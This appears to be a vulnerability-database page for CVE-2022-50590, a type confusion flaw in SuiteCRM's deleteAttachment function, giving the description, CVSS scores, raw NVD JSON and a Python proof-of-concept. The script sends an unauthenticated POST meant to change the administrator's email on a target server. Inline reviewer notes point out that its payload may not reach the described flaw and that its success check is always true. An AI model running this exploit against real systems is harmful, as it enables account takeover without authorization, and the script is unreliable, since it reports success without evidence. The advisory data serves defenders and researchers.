Security Vulnerability Report
CVE-2022-50590 CVSS 5.3 MEDIUM

CVE-2022-50590

Published: 2025-11-06 20:15:37
Last Modified: 2025-11-24 19:05:39

Description

SuiteCRM versions prior to 7.12.6 contain a type confusion vulnerability within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects including changing the email address of the administrator.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Note: the 5.3 MEDIUM shown here is the primary CVSS 3.1 score; the raw JSON record below also carries a secondary CVSS 4.0 assessment that rates the same issue 8.8 HIGH (vulnerable-system integrity impact HIGH). Prioritise with both in view.

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 7.12.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC script attached to the CVE-2022-50590 report (SuiteCRM deleteAttachment,
# CWE-843 type confusion; fixed in SuiteCRM 7.12.6).
#
# Reviewer notes:
# - The report locates the flaw in how the 'module' parameter is *processed*
#   (a type confusion), yet this script sends 'module' as an ordinary string
#   and adds 'field_name' / 'new_value' parameters that the report's
#   description never mentions. Nothing on this page establishes that this
#   request reaches the described code path; compare against the referenced
#   third-party advisory before treating it as a working reproducer.
# - The "success" check is a tautology (see inline note in the function), so
#   any HTTP 200 response is reported as potential success.
# - Defender note: the request this script emits is an unauthenticated POST to
#   index.php with action=deleteAttachment; instances below 7.12.6 should be
#   upgraded, and web/application logs can be reviewed for that request shape.
import requests  # third-party HTTP client, not part of the standard library
import sys

# CVE-2022-50590 PoC - SuiteCRM deleteAttachment Type Confusion
# Target: SuiteCRM < 7.12.6
# Effect: Unauthenticated attacker can modify database objects


def exploit_suitecrm(target_url: str, admin_new_email: str) -> bool:
    """
    Exploit type confusion vulnerability in SuiteCRM deleteAttachment
    functionality to change administrator email address.

    Args:
        target_url: Base URL of vulnerable SuiteCRM instance
        admin_new_email: New email address to set for admin account

    Returns:
        True when the POST returned HTTP 200, False on any other status or on
        a requests connection error. A True result does not verify that any
        database row changed; the status check below is always satisfied once
        a 200 is seen.

    Side effects:
        Sends one unauthenticated HTTP POST to ``<target_url>/index.php`` and
        prints progress lines to stdout.
    """
    # Target endpoint for deleteAttachment functionality
    endpoint = f"{target_url.rstrip('/')}/index.php"

    # Type confusion payload - module parameter manipulation
    # The vulnerability allows arbitrary database modification via type confusion
    # NOTE(review): 'module' is sent as a plain string here, while the report
    # attributes the flaw to the processing of that parameter's type. The
    # 'field_name' and 'new_value' keys do not appear in the report's
    # description; their relevance to the described flaw is unverified.
    payload = {
        'module': 'Users',  # Target module for admin modification
        'action': 'deleteAttachment',  # Vulnerable action
        'record': '1',  # Admin user record ID
        'field_name': 'email1',  # Field to modify
        'new_value': admin_new_email  # New email for admin account
    }

    print(f"[*] Exploiting CVE-2022-50590 on {target_url}")
    print(f"[*] Target: {endpoint}")
    print(f"[*] Payload: {payload}")

    try:
        # Send exploit request (no authentication required)
        response = requests.post(endpoint, data=payload, timeout=30)

        if response.status_code == 200:
            print("[+] Request sent successfully")
            print(f"[*] Response status: {response.status_code}")

            # Check if email was modified
            # NOTE(review): inside this branch status_code is already 200, so the
            # `or response.status_code == 200` clause makes the whole condition
            # unconditionally true. Every 200 response (e.g. an ordinary login
            # page) is therefore reported as a potential success; the "[!]"
            # lines carry no evidence that the record changed.
            if admin_new_email in response.text or response.status_code == 200:
                print(f"[!] Potential successful exploitation")
                print(f"[!] Admin email may have been changed to: {admin_new_email}")
                return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    # Command-line entry point: <target_url> <new_admin_email>
    if len(sys.argv) < 3:
        print("Usage: python cve_2022_50590.py <target_url> <new_admin_email>")
        print("Example: python cve_2022_50590.py http://target.com/ [email protected]")
        sys.exit(1)

    target = sys.argv[1]
    new_email = sys.argv[2]
    exploit_suitecrm(target, new_email)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50590", "sourceIdentifier": "[email protected]", "published": "2025-11-06T20:15:36.990", "lastModified": "2025-11-24T19:05:39.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM versions prior to 7.12.6 contain a type confusion vulnerability within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects including changing the email address of the administrator."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.12.6", "matchCriteriaId": "ADD22F85-ECD2-455A-9441-636E35C01F1B"}]}]}], "references": [{"url": "https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-deleteattachment-type-confusion-vulnerability/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/suitecrm-type-confusion-via-deleteattachment-functionality", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}